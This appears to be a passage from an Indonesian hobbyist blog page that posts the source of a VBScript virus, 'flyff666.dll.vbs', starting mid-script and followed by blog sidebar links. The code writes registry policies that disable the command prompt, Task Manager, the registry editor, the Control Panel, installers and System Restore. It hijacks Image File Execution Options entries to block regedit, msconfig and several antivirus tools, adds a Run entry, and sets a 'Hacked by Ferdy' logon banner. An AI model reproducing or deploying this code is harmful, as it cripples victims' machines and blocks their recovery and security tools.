rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoScrSavPage", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCpl", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoClose", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoFileMenu", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoRun", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System Monitoring", "1", "REG_DWORD"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Hacked by Ferdy"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "Saya Adalah Program Jahat yang Mengambil Alih Komputer kalian !! dibuat Oleh Ferdy"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashAvast.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe\Debugger",""
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption", "H4x0r3d By Flyff 666"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeText", "Saya Adalah Program Jahat yang Akan Mengambil Alih Komputer kalian !! System was Hacked BY : ferdy (themaniac) From Indonesian Hackers Community"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\LimitSystemRestoreCheckpointing", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\DisableMSI", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig", "1", "REG_DWORD"

if check <> 1 then
WScript.sleep 100000
end if
loop while check<>1
set sd = createobject("WScript.shell")
sd.run winpath & "\explorer.exe /e,/select, " & WScript.ScriptFullname

source: flyff666.dll.vbs

Selamat Datang

Ulasan Singkat

Alasan Menulis Blog

Deskripsi

Motivasi

Jumat, 05 Maret 2010

Memodifikasi source code stealing password

Selasa, 02 Maret 2010

kendi.vbs

batch made by ferdy

flyff666.dll.vbs

Terbaru

Entri Populer

Adsense

Blog Archive

Facebook

My Widget

Counter Statistik

tuKeran Link

Ilmu Komputer

KOMPAS

Tribunnews